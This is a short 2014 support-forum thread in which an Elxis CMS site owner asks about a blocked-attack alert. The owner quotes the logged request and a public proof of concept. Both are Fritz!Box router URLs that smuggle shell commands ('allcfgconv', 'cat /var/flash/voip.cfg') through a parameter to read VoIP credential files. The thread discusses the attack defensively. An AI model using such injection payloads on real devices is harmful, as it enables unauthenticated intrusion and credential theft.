Welcome,
Guest
.
Please
login
or
register
.
Did you miss your
activation email
?
News:
Elxis documentation
for users and developers.
Home
Help
Login
Register
Elxis CMS Forum
»
Support
»
Security
»
Any clue what could have been the intention
« previous
next »
Print
Pages: [
1
]
Author
Topic: Any clue what could have been the intention (Read 10792 times)
timalsina
Jr. Member
Posts: 73
Any clue what could have been the intention
«
on:
September 08, 2014, 23:40:17 »
I received this email. Any clue what could have been the intention here:
Elxis Defender blocked an attack to your site!
Reference code: SEC-DEFG-0130
Elxis Defender report
Signatures: general
Match method: inmatch
Haystack: requesturi
Pattern match: ..
Reason: Directory traversal attack.
Requested URI: //cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=& allcfgconv -C voip -c -o - ../../../../../var/tmp/voip.cfg &
IP address: 195.154.183.174
Hostname: 195-154-183-174.rev.poneytelecom.eu
User agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.14.0.0 zlib/1.2.3 libidn/1.18 libssh2/1.4.2
Date (UTC): 2014-09-07 18:39:27
Site URL:
http://www.sitedomain.com
Logged
timalsina
Jr. Member
Posts: 73
Re: Any clue what could have been the intention
«
Reply #1 on:
September 08, 2014, 23:45:50 »
This is what I've found so far: Source(
http://www.exploit-id.com/author/admin/page/9
)
App : Fritz!Box Author : 0x4148 Fritz!Box is Networking/voice Over ip router produced by AVM it suffer from Unauthenticated remote command execution flaw Poc :
https://ip/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20cat%20/var/flash/voip.cfg%20%26
#0x4148_rise - See more at:
http://www.exploit-id.com/author/admin/page/9#sthash.U7oGuIkW.dpuf
Logged
datahell
Elxis Team
Hero Member
Posts: 10356
Re: Any clue what could have been the intention
«
Reply #2 on:
September 10, 2014, 08:19:14 »
Looks like a random scan for known exploits. Nothing to worry about. I receive dozens of similar alerts daily.
Logged
Elxis Team
|
Is Open Source
|
IOS Rentals | IOS AERO
webgift
Elxis Team
Hero Member
Posts: 4193
Re: Any clue what could have been the intention
«
Reply #3 on:
September 11, 2014, 15:03:22 »
Me too! Don't worry... It's a routine!
«
Last Edit: December 03, 2014, 11:24:26 by webgift
»
Logged
Elxis Team •
Custom web design [EN]
-
[EL]
•
.GR Registrar
seadhna
Hero Member
Posts: 507
Re: Any clue what could have been the intention
«
Reply #4 on:
November 26, 2014, 17:46:54 »
Is there a way to switch off these alerts by email?
Logged
webgift
Elxis Team
Hero Member
Posts: 4193
Re: Any clue what could have been the intention
«
Reply #5 on:
November 27, 2014, 18:11:26 »
From backend - [top menu] Site - Settings - [tab] Errors - [Option] Alert switch to
No
«
Last Edit: December 03, 2014, 11:24:18 by webgift
»
Logged
Elxis Team •
Custom web design [EN]
-
[EL]
•
.GR Registrar
seadhna
Hero Member
Posts: 507
Re: Any clue what could have been the intention
«
Reply #6 on:
December 05, 2014, 15:59:03 »
Thanks!
Logged
Print
Pages: [
1
]
« previous
next »
Elxis CMS Forum
»
Support
»
Security
»
Any clue what could have been the intention